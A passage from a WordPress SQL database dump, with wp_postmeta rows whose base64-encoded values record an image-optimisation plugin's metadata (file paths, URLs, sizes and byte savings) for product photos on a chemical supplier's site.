50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzcxLCJpZCI6OTU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTM3NCwiaWQiOjk1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2gtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2gtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0yLW9pbC1mc2gtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzkzNzcsImlkIjo5NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5MzgwLCJpZCI6OTU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMi1vaWwtZnNoLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1OSwidGltZSI6MTQ4MzU3OTM4MywiaWQiOjk1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTM4NiwiaWQiOjk1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTM4OSwiaWQiOjk1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTM5MiwiaWQiOjk1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTItb2lsLWZzaC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTM5NSwiaWQiOjk1OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29878, 957, 'wpfc_optimisation_reduction', '2864505'); 
INSERT INTO `wp_postmeta` VALUES (29879, 957, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLmpwZyIsIndpZHRoIjo1NjE2LCJoZWlnaHQiOjM3NDQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2guanBnIiwicmVkdWN0aW9uIjoyODY0NDkyLCJ0aW1lIjoxNDgzNTc5NDA3LCJpZCI6Ijk1NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDEwLCJpZCI6OTU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQxMywiaWQiOjk1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2gtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2gtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2gtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk0MTcsImlkIjo5NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk0MjEsImlkIjo5NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDI0LCJpZCI6OTU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1zdXJmYWN0YW50LTEtb2lsLWZzaC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3OTQyNiwiaWQiOjk1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2gtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2gtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtc3VyZmFjdGFudC0xLW9pbC1mc2gtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzk0MjksImlkIjo5NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDMyLCJpZCI6OTU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDM1LCJpZCI6OTU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDM4LCJpZCI6OTU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDQwLCJpZCI6OTU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDQzLCJpZCI6OTU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXN1cmZhY3RhbnQtMS1vaWwtZnNoLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDQ2LCJpZCI6OTU3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29880, 951, 'wpfc_optimisation_reduction', '2715636'); 
INSERT INTO `wp_postmeta` VALUES (29881, 951, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI1NTEuanBnIiwicmVkdWN0aW9uIjoyNzE1MTg1LCJ0aW1lIjoxNDgzNTc5NDU3LCJpZCI6Ijk1MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNTUxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5NDYwLCJpZCI6OTUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjU1MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjA